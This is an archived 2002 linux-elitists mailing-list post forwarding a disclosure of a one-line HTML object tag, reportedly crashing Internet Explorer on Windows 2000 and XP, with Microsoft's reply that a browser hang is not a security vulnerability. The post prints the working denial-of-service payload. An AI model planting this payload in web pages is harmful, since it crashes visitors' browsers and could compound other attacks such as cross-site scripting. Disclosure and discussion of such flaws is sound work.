[linux-elitists] A DoS against IE in W2K and XP? You Make the Call...

Marc MERLIN marc@merlins.org
Fri Jun 28 13:41:36 PDT 2002


For your web page design needs...

----- Forwarded message from "'ken'@FTU" <ken_at_ftu@yahoo.com> -----

The following line of code will crash IE when the OS is Windows 2000 or 
Windows XP.

<!--  start dosIE-doe.html -->

<object ID="dosIE-doe" 
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>

<!-- end dosIE-doe.html -->


I alerted Microsoft. They replied that it is not a security 
vulnerability according to their policy:

================= Begin MS reply ========================

"Suppose a flaw in a web browser could be misused by a web site to
"hang" the browser of any user who visited the site. If the user were
able to resume normal operation by stopping the browser, restarting it,
and avoiding the attacker's web site in the future, the flaw would not
constitute a security vulnerability."
(For the complete definition of a security vulnerability please see
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp)

================= End MS reply ===========================


I am aware that this code is more an inconvenience that anything else. 
Although, if it were combined with another vulnerability its effect may 
be much worse. (Say a XSS vulnerability also exists and an attacker 
could crash the browser of every user that visits your ecommerce site...)


'ken'@FTU


----- End forwarded message -----

-- 
"A mouse is a device used to point at the xterm you want to type in" - A.S.R.
Microsoft is to operating systems & security ....
                                      .... what McDonalds is to gourmet cooking 
Home page: http://marc.merlins.org/   |   Finger marc_f@merlins.org for PGP key



More information about the linux-elitists mailing list